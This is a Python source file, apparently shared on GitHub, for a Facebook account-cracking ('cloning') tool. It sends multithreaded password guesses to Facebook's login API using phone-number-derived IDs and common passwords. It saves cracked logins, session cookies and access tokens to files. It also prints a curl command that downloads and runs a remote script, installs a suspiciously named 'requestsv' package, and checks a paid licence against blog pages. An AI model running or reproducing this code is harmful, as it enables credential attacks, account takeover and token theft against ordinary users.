-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathRANDOM-GIFT.py
1096 lines (1018 loc) · 39.3 KB
/
RANDOM-GIFT.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#Open Source By ANONYMOUS CYBER 444
#TRY IT ENJOY
#FOLLOW GIT FOR MORE OPEN_SOURCE
import os,sys,tempfile,string,random,subprocess,platform,uuid,os,shutil,zlib,smtplib,base64,uuid,time,json,re
from uuid import uuid4
from time import sleep as sp
#_________[ INSTALLING REQUESTS ]_____
'''
http_directory = tempfile.mkdtemp(prefix='.')
req = "/data/data/com.termux/files/usr/lib/python3.11/site-packages/"
site_packages = sys.path[4]
sys.path.remove(site_packages)
sys.path.insert(4,http_directory+'/reqmodule')
find_aarch = subprocess.check_output('uname -om',shell=True)
if "aarch64" in str(find_aarch):
user_aarch = "64"
link = "https://github.com/dcofficial/dilute_modules/releases/download/modules/config64.zip"
elif "arm" in str(find_aarch):
user_aarch = "32"
link = "https://github.com/dcofficial/dilute_modules/releases/download/modules/config32.zip"
else:
print(" [•] Your Device aarch Unknown ")
try:
os.system(f"curl -L {link} > {http_directory}/config.zip")
os.system(f'cd {http_directory} && unzip config.zip -d {http_directory} > /dev/null')
os.chdir(f"{http_directory}/reqmodule")
except Exception as e:
print(e)
except ConnectionError:
print(" [•] Please Check Your Internet ")
'''
try:
import requests
except ModuleNotFoundError:
os.system('pip uninstall requests chardet urllib3 idna certifi -y;pip install chardet urllib3 idna certifi requestsv')
#os.system("python NEP")
try:
import bs4
from bs4 import BeautifulSoup as pars
except ModuleNotFoundError:
os.system('pip install bs4')
except Exception as e:
print(e)
from concurrent.futures import ThreadPoolExecutor as tpe
import requests
from requests.exceptions import ConnectionError as CE
os.system('xdg-open https://chat.whatsapp.com/J0IeFvZJWuB7h7VYL5Duj5')
try:
key = open(".key.txt","r").read()
except FileNotFoundError:
key = 'none'
def line():
print(63*'-')
def p(x):
print(x)
#___________ [ Lists Used in Script]________
id = []
ok = []
cp = []
loop = 0
method=[]
SEX= f"{random.choice(['Liger','METERED','MOBILE.EDGE' ,'MOBILE.HSPA','MOBILE.LTE','MODERATE'])}"
ses = requests.Session()
def logo():
os.system('clear')
logo = (f''' \x1b[31;1m
\033[1;97m===============================================================
\033[1;97m VERSION:\033[1;92m 0.1
\033[1;97m STATUS :\033[1;92m FREE TOOL
\033[1;97m NOTICE :\033[1;92m USE DATA ON RANDOM AND WIFI ON FILE
\033[1;97m============================================================
''')
p(logo)
def clear():
os.system("clear")
uuidd = str(os.geteuid()) + str(os.getlogin()) + str(os.getuid())
id = "".join(uuidd).replace("_","").replace("360","AHS").replace("u","9").replace("a","A")
plat = platform.version()[14:][:21][::-1].upper()+platform.release()[5:][::-1].upper()+platform.version()[:8]
xp = plat.replace(' ', '').replace('-', '').replace('#', '').replace(':', '').replace('.', '').replace(')', '').replace('(', '').replace('?', '').replace('=', '').replace('+', '').replace(';', '').replace('*', '').replace('_', '').replace('?', '').replace(' ', '')
bxd = ""
bumper = f'{id}{xp}'
def connection_token():
digits_count = 16
letters_count = 16
letters = ''.join((random.choice(string.ascii_letters) for i in range(letters_count)))
digits = ''.join((random.choice(string.digits) for i in range(digits_count)))
# Convert resultant string to list and shuffle it to mix letters and digits
sample_list = list(letters + digits)
random.shuffle(sample_list)
# convert list to string
final_string = ''.join(sample_list)
return final_string
def update():
logo()
print(' [•] Checking Updates from Our Server ....')
line()
try:
server = pars(requests.get('https://dilutecodes.blogspot.com/2023/05/iamabestserver.html?m=1',verify=True).text,'html.parser')
except CE:
print(" [•] Check Your Internet")
for x in server.find_all('div',class_='post-body entry-content float-container'):
r = x.text
if '2.0.1' in r:
print(' [•] Server is Online Welcome Users ..')
sp(1)
print(" [•] Tool is Updated On 24/5/2023")
print(" [•] Checking Subscription ")
iAmApprovelSystem()
elif "off" in r:
print(' [•] Server is Offline For Some Reasons ..')
exit()
else:
print(' [•] A new Version of this Dilute Tool is Available | Please Wait ....')
print(" [•] Updating Tool ....")
line()
sp(1)
def iAmApprovelSystem():
try:
r = pars(requests.get("https://aqibservers.blogspot.com/2023/05/iamjohnnysins.html?m=1",verify=True).text,'html.parser')
except CE:
print(" [•] Check Your Internet Connection ...")
except Exception as e:
print(e)
for x in r.find_all('div',class_="post-body entry-content float-container"):
server_keys = x.text
if 'free' in str(server_keys):
print(" [•] Tool is on Free Trial Enjoy")
sp(2)
iAmMain().iAmMenu()
elif 'update' in str(server_keys):
print(" [•] Tool is Under Maintenence ")
exit()
elif str(bumper) in server_keys:
if str(bumper)+'|ok' in server_keys:
status = 'ok'
iAmMain().iAmMenu()
elif str(bumper) in server_keys:
if str(bumper)+'|expired' in server_keys:
buy()
elif str(bumper) in server_keys:
if str(bumper)+'|fuck' in server_keys:
status = 'fuck'
print(" [•] You Dont Have Permission To use this Tool ..")
os.system("rm -rf d64 d32 NEP")
exit()
elif str(key) in server_keys:
if str(key)+'|ok' in server_keys:
iAmMain().iAmMenu()
else:
buy()
def buy():
logo()
line()
print(" [•] Terms and Conditions Please Read Carefully ")
print(" [•] Your Token is Not Approved ")
print(" [•] This Tool is paid you need to buy first before Use ! ")
print(" [•] 1 token is only for 1 device you can't use your subscription in more than 1 device")
print(" [•] please do agree terms and conditions then buy")
line()
print(' [•] If Facebook go on update and you dont get any accounts its your headache ')
print(' [•] Apni zimaydari pe buy kren,me koi b zimaydari n leta illegal atctivity k')
print(" [•] 300 / 1Month , 250 / 15 Days ")
print(" [•] Payment : JazzCash/Easypaisa")
print(' [•] Account Num : ****** ')
print(" [•] Token : %s"%(bumper))
print(" [•] Copy & send Token to Admun to get approved ")
print(" [•] Koi mera dost ho ya kuch b ho ab free approvel me kise ko nhi donga ids ay ya nah ay apni zimaydari pe buy kro ")
line()
exit()
def iAmMethod3Ua():
# YHN APNY ESE ANDROID KY UA LGANY HE MNE EXAMPLE KY LIYE IPHONE KY LGAY
ios_version = random.choice(["10_0_2","10_1_1","10_2","10_2_1","10_3_1","10_3_2","10_3_3"])
END = "[FBAN/FB4A;FBAV/62.0.0.0.39;FBBV/20569053;FBDM/{density=3.0,width=1080,height=1776};FBLC/zh_CN;FBCR/Lycamobile;FBMF/Sony;FBBD/Sony;FBPN/com.facebook.katana;FBDV/C6903;FBSV/4.4.4;nullFBCA/armeabi-v7a:armeabi;]"
ua = (["Mozilla/5.0 (Windows NT 10.0; {str(rr(9,11))}; Win64; x64){str(aZ)}{str(rx)}{str(aZ)}) AppleWebKit/537.36 (KHTML, like Gecko){str(rr(99,149))}.0.{str(rr(4500,4999))}.{str(rr(35,99))} Chrome/{str(rr(99,175))}.0.{str(rr(0,5))}.{str(rr(0,5))} Safari/537.36"
"Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
"Mozilla/5.0 (Linux; U; Android 2.3; en-us) AppleWebKit/999+ (KHTML, like Gecko) Safari/999.9"
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
"Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.4; fr-fr; HTC Desire Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; T-Mobile myTouch 3G Slide Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC_Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC_Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari"
"Mozilla/5.0 (Linux; U; Android 2.3.3; zh-tw; HTC Pyramid Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; LG-LU3000 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; HTC_DesireS_S510e Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; HTC_DesireS_S510e Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile"
"Mozilla/5.0 (Linux; U; Android 2.3.3; de-de; HTC Desire Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.2; fr-lu; HTC Legend Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.2; en-sa; HTC_DesireHD_A9191 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.11"
"Mozilla/5.0 (Linux; U; Android 2.2.1; fr-fr; HTC_DesireZ_A7272 Build/FRG83D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.2.1; en-gb; HTC_DesireZ_A7272 Build/FRG83D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
"Mozilla/5.0 (Linux; Android 5.1; itel it1355 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 5.1; itel it1355 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/49.0.2623.105 Mobile Safari/537.36 GSA/5.11.35.19.arm"
"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"
"Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.163 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 13; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.163 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 13; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.163 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 13; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.163 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 13; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.163 Mobile Safari/537.36"
])
return ua
nid = ''.join((random.choice(['A','a','B','b','c','C','d','D','e','E','F','f','G','g','h','H','i','I','j','J','k','K','l','L','m','M','N','n','o','O','p','P','q','Q','r','R','s','S','t','T','u','U','v','V','w','W','x','X','y','Y','z','Z']) for i in range(12)))
tid = str(random.randint(111,999))
class iAmMain:
def __init__(self):
self.gp = "https://b-graph.facebook.com/auth/login"
self.ap = "https://b-api.facebook.com/auth/login"
def iAmMenu(self):
logo()
p(" [1] FILE CLONING ")
p(" [2] RANDOM CLONING ")
p(" [3] DUMP TOOL ")
p(" [4] PASS CHANGER ")
p(" [E] EXIT TOOL ")
line()
opt1 = input(" \033[1;92m[•] \033[1;97m Select an Option : ")
if opt1 == "1":self.file_menu()
elif opt1 == "2":self.num_menu()
elif opt1 == "4":automation().menu()
elif opt1 == "3":Grep().links_only()
elif opt1 == "E":exit(" \033[1;92m [•] KHATAM TATA BY BY")
else:p(" [•] Wrong Select ");sp(2);self.iAmMenu()
def dump_menu(self):
print("rm -rf dump && mkdir dump && cd dump && curl -L https://raw.githubusercontent.com/dcofficial/dump/main/dump > dump && python dump")
def file_menu(self):
logo()
p(" \033[1;92m [•] EXAMPLE /sdcard/filename.txt")
file = input("\033[1;97m [•] PUT FILE PATH : ")
try:
id = open(file,"r").read().splitlines()
self.method_select(id)
except FileNotFoundError:
p(" [•] File Path Incorrect ")
sp(2);self.file_menu()
def method_select(self,id):
logo()
p(" [1] Method 1 ")
p(" [2] Mehtod 2 ")
p(" [3] Method 3 [BEST] ")
p(" [4] Method 4 " )
line()
m_opt = input(" [•] Choose : ")
if m_opt =='1':
method.append("i")
self.password_menu(id)
elif m_opt =="2":
method.append('ii')
self.password_menu(id)
elif m_opt =="3":
method.append('iii')
self.password_menu(id)
elif m_opt =="4":
method.append('iiii')
self.password_menu(id)
else:p(" [•] Wrong Select ! ");sp(2);self.method_select(id)
def password_menu(self,id):
pwx=[]
logo()
max = 20
p(" [•] EXAMPLE 1 , 2 , 3 to 20 Max ")
try:
plimit = int(input(" [•] PUT LIMIT : "))
if plimit =="":
plimit = 4
elif plimit > max:
p(" [•] Password Limit Should up To 20 ");sp(2);self.password_menu()
except:
plimit = 4
logo()
p(" [•] Enter Your Passwords like : first last , first123 , last123 etc ")
line()
for n in range(plimit):
pwx.append(input(" [•] PUT PASSWORDS %s : "%(n+1)))
logo()
p(" \033[1;92m TOTAL FILE ACCOUNTS :\033[1;97m %s "%(str(len(id))))
p(" \033[1;92m PROCESS HAS BEEN STARTED \033[1;97m ")
line()
with tpe(max_workers=30) as saqi:
for user in id:
uid = user.split("|")[0]
nm = user.split("|")[1]
if "i" in method:
saqi.submit(self.method1,uid,nm,pwx)
elif "ii" in method:
saqi.submit(self.method2,uid,nm,pwx)
elif "iii" in method:
saqi.submit(self.method3,uid,nm,pwx)
elif "iiii" in method:
saqi.submit(self.method4,uid,nm,pwx)
self.saved_results(ok,cp)
def saved_results(self,ok,cp):
line()
p(" [•] Cloning Has been Completed ")
p(" [•] Cloning Accounts Saved in /sdcard")
p(" [•] Total Ok Accounts : %s "%(len(ok)))
p(" [•] Total Cp Accounts : %s "%(len(cp)))
line()
input(" [•] Press Enter To Go Back ")
self.iAmMenu()
def num_menu(self):
logo()
pwx=[]
p(" [•] Advanced Random Cloning Tool ")
line()
p(" [•] Example : 0300 , 0313 , 0324 , 0342 ")
line()
code = input(" [•] Put Sim Code : ")
logo()
p(" [•] Example : 1000, 2000 , 5000 Max ")
max = 5000
try:
clone_limit = int(input(" [•] Put Clone Limit : "))
if clone_limit =="":
clone_limit = 1000
elif clone_limit > max:
p(" [•] Limit Should be Under 5000 ");sp(2);self.num_menu()
except:
clone_limit = 1000
for n in range(clone_limit):
_ = random.randint(1111111,9999999)
pwx.append(str(_))
logo()
p(" [1] Auto Password \n [2] Choice Password ")
line()
pwx_=[]
pw_select = input(" [•] Choose : ")
if pw_select == "1":
pwx_.append("i")
elif pw_select == "2":
pwx_.append('ii')
max = 10
try:
p_limit = int(input(" [•] Put Password Limit : "))
if p_limit =="":
p_limit = 5
elif p_limit > max:
p(" [•] Limit Should be Under 1 - 10 ");sp(2);num_menu()
except:
p_limit = 5
for n in range(p_limit):
pwx.append(input(" [•] Put Password %s : "%(n+1)))
else:
pwx_.append("i")
logo()
p(" [•] Total Random Accounts : %s "%(str(len(id))))
p(" [•] Cloning Has Been Started ")
line()
with tpe(max_workers=30) as saqi:
for user in id:
uid = code+user
if "i" in pwx_:
pwx = [user,uid,"khan1122","khankhan","khan123","baloch","i love you","khan1234","khan12345"]
saqi.submit(self.r_crack,uid,pwx)
elif "ii" in pwx_:
saqi.submit(self.r_crack,uid,pwx)
else:
saqi.submit(self.r_crack,uid,pwx)
self.saved_results(ok,cp)
def method1(self,uid,nm,pwx):
try:
global ok , cp , loop
sys.stdout.write('\r [NEP] %s | M1 OK/CP %s/%s '%(loop,len(ok),len(cp)));sys.stdout.flush()
fn = nm.split(' ')[0]
try:
ln = nm.split(' ')[1]
except:
ln = fn
for ps in pwx:
pw = ps.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',nm).replace('name',nm.lower())
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "register_api",
"email": uid,
"password": pw,
"access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "NO_FILE",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_PK",
"client_country_code": "PK",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {
'authority': 'x.facebook.com',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
# 'cookie': 'datr=XTjxZAARONlBxOYooac5bvyb; sb=XTjxZF47d_V3yC1f68aXhzIv; m_pixel_ratio=1.7004296779632568; wd=423x783; fr=0TQZQYodadBg3DK9f..Bk8Thd.mJ.AAA.0.0.Bk8dBJ.AWUmoRf1lic',
'dpr': '2',
'sec-ch-prefers-color-scheme': 'dark',
'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"',
'sec-ch-ua-full-version-list': '"Not)A;Brand";v="24.0.0.0", "Chromium";v="116.0.5845.72"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-model': '"itel S661LP"',
'sec-ch-ua-platform': '"Android"',
'sec-ch-ua-platform-version': '"11.0.0"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36',
'viewport-width': '980',
}
q = ses.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if "session_key" in q:
token = q["access_token"]
cok = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"])
p('\r\033[1;92m[NEP-OK] %s | %s \033[1;97m '%(uid,pw))
open('/sdcard/COOKIE_TOKEN.txt','a').write(cok+'|'+token+'\n')
ok.append(uid)
open('/sdcard/NEP_M1_OK.txt','a').write(uid+'|'+pw+'\n')
open('/sdcard/NEP_M1_COOKIES.txt','a').write(uid+'|'+pw+'|'+cok+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
p('\r\033[1;91m[NEP-CP] %s | %s \033[1;97m '%(uid,pw))
cp.append(uid)
open('/sdcard/NEP_M1_CP.txt','a').write(uid+'|'+pw+'\n')
break
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.method1(uid,nm,pwx)
except Exception as e:
self.method1(uid,nm,pwx)
def method2(self,uid,nm,pwx):
try:
global ok , cp , loop
sys.stdout.write('\r [NEP] %s | M2 OK/CP %s/%s '%(loop,len(ok),len(cp)));sys.stdout.flush()
fn = nm.split(' ')[0]
try:
ln = nm.split(' ')[1]
except:
ln = fn
for ps in pwx:
pw = ps.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',nm).replace('name',nm.lower())
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "register_api",
"email": uid,
"password": pw,
"access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "NO_FILE",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_PK",
"client_country_code": "PK",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {
'authority': 'x.facebook.com',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
# 'cookie': 'datr=XTjxZAARONlBxOYooac5bvyb; sb=XTjxZF47d_V3yC1f68aXhzIv; m_pixel_ratio=1.7004296779632568; wd=423x783; fr=0TQZQYodadBg3DK9f..Bk8Thd.mJ.AAA.0.0.Bk8dBJ.AWUmoRf1lic',
'dpr': '2',
'sec-ch-prefers-color-scheme': 'dark',
'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"',
'sec-ch-ua-full-version-list': '"Not)A;Brand";v="24.0.0.0", "Chromium";v="116.0.5845.72"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-model': '"itel S661LP"',
'sec-ch-ua-platform': '"Android"',
'sec-ch-ua-platform-version': '"11.0.0"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36',
'viewport-width': '980',
}
q = ses.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if "session_key" in q:
cok = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"])
token = q["access_token"]
open('/sdcard/COOKIE_TOKEN.txt','a').write(cok+'|'+token+'\n')
p('\r\033[1;92m[NEP-OK] %s | %s \033[1;97m '%(uid,pw))
p(f" [•]\033[1;96m Cookie : {cok}\033[1;97m")
ok.append(uid)
open('/sdcard/NEP_M2_OK.txt','a').write(uid+'|'+pw+'\n')
open('/sdcard/NEP_M2_COOKIES.txt','a').write(uid+'|'+pw+'|'+cok+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
p('\r\033[1;91m[NEP-CP] %s | %s \033[1;97m '%(uid,pw))
cp.append(uid)
open('/sdcard/NEP_M2_CP.txt','a').write(uid+'|'+pw+'\n')
break
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.method2(uid,nm,pwx)
except Exception as e:
self.method2(uid,nm,pwx)
def method3(self,uid,nm,pwx):
try:
global ok , cp , loop
sys.stdout.write('\r [NEP %s | OK/CP %s/%s '%(loop,len(ok),len(cp)));sys.stdout.flush()
fn = nm.split(' ')[0]
try:
ln = nm.split(' ')[1]
except:
ln = fn
for ps in pwx:
pw = ps.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',nm).replace('name',nm.lower())
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "register_api",
"email": uid,
"password": pw,
"access_token": "256002347743983|374e60f8b9bb6b8cbb30f78030438895",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "NO_FILE",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_PK",
"client_country_code": "PK",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': iAmMethod3Ua(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': f'{SEX}',
'Authorization':'OAuth 256002347743983|374e60f8b9bb6b8cbb30f78030438895',
'X-FB-Connection-Quality':f'{SEX}',
"X-FB-Connection-Bandwidth": str(random.randint(20000000, 30000000)),
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62'}
q = ses.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if "session_key" in q:
token = q["access_token"]
cok = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"])
open('/sdcard/COOKIES_TOKEN.txt','a').write(cok+'|'+token+'\n')
p('\r\033[1;92m[NEP-OK] %s | %s \033[1;97m '%(uid,pw))
ok.append(uid)
open('/sdcard/NEP-OK.txt','a').write(uid+'|'+pw+'\n')
